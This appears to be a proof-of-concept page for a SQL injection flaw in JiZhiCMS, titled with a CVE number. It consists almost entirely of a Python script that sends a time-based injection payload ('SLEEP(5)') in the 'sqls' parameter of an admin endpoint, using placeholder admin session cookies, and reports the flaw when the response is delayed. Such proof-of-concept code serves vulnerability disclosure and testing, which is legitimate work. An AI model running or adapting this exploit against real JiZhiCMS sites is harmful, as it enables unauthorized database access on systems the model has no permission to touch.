CVE-2026-6978 JiZhiCMS SQL注入漏洞

import requests # Target URL (Vulnerable endpoint) target_url = "http://example.com/index.php/admins/Sys/addcache.html" # The vulnerability is in the 'sqls' parameter. # 'htmlspecialchars_decode' reverses the encoding, allowing SQL injection. # Note: This attack requires High Privileges (Admin session). payload = { "sqls": "1' AND SLEEP(5)-- -" # Simple time-based injection test } # Admin cookies are required due to PR:H (High Privileges) cookies = { "PHPSESSID": "valid_admin_session_id_here", "admin_username": "admin" } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: SQL Injection triggered a delay.") else: print("[-] No delay detected, check privileges or payload.") print("[+] Response Status:", response.status_code) except Exception as e: print(f"[!] Error: {e}")